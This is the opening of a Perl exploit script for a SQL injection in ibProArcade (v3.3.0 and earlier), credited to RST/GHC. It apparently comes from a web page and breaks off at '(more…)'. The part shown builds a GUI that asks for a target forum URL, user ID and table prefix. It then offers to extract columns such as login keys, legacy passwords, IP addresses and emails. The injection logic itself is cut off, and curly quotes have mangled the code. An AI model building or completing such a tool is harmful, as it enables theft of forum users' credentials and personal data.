#!/usr/bin/perl
## ibProArcade < = v3.3.0 sql injection exploit
## (c)oded by 1dt.w0lf
## RST/GHC
## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE
## KEEP IT PRIVATE
use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;
BEGIN {
if($^O eq 'MSWin32'){
require Win32::Console;
Win32::Console::Free();
}
}
$mw = new MainWindow(title => “r57ibProArcade” );
$mw->geometry ( ‘420x310′ ) ;
$mw->resizable(0,0);
$mw->Label(-text => ‘!’, -font => ‘{Webdings} 22′)->pack();
$mw->Label(-text => ‘ibProArcade sql injection exploit by RST/GHC’, -font => ‘{Verdana} 7 bold’,-foreground=>’red’)->pack();
$mw->Label(-text => ‘’)->pack();
$fleft=$mw->Frame()->pack ( -side => ‘left’, -anchor => ‘ne’) ;
$fright=$mw->Frame()->pack ( -side => ‘left’, -anchor => ‘nw’) ;
$url = ‘http://127.0.0.1/ipb216/index.php’;
$user_id = ‘1′;
$prefix = ‘ibf_’;
$column = ‘member_login_key’;
$report = ‘’;
$true = 0;
$false = 0;
$fleft->Label ( -text => ‘Path to forum index: ‘, -font => ‘{Verdana} 8 bold’) ->pack ( -side => “top” , -anchor => ‘e’ ) ;
$fright->Entry ( -relief => “groove”, -width => 35, -font => ‘{Verdana} 8′, -textvariable => \$url) ->pack ( -side => “top” , -anchor => ‘w’ ) ;
$fleft->Label ( -text => ‘User ID: ‘, -font => ‘{Verdana} 8 bold’ ) ->pack ( -side => “top” , -anchor => ‘e’ ) ;
$fright->Entry ( -relief => “groove”, -width => 35, -font => ‘{Verdana} 8′, -textvariable => \$user_id) ->pack ( -side => “top” , -anchor => ‘w’ ) ;
$fleft->Label ( -text => ‘Database tables prefix: ‘, -font => ‘{Verdana} 8 bold’) ->pack ( -side => “top” , -anchor => ‘e’ ) ;
$fright->Entry ( -relief => “groove”, -width => 35, -font => ‘{Verdana} 8′, -textvariable => \$prefix) ->pack ( -side => “top” , -anchor => ‘w’ ) ;
$fright->Label( -text => ‘ ‘)->pack();
$fleft->Label( -text => ‘ ‘)->pack();
$fleft->Label ( -text => ‘get data from database’, -font => ‘{Verdana} 8 bold’,-foreground=>’green’) ->pack ( -side => “top” , -anchor => ‘e’ ) ;
$fright->Label( -text => ‘ ‘)->pack();
$fleft->Label ( -text => ‘Get data from column: ‘, -font => ‘{Verdana} 8 bold’) ->pack ( -side => “top” , -anchor => ‘e’ ) ;
$b = $fright->BrowseEntry( -relief => “groove”, -variable => \$column, -font => ‘{Verdana} 8′);
$b->insert(”end”, “member_login_key”);
$b->insert(”end”, “name”);
$b->insert(”end”, “ip_address”);
$b->insert(”end”, “legacy_password”);
$b->insert(”end”, “email”);
$b->pack( -side => “top” , -anchor => ‘w’ );
(more…)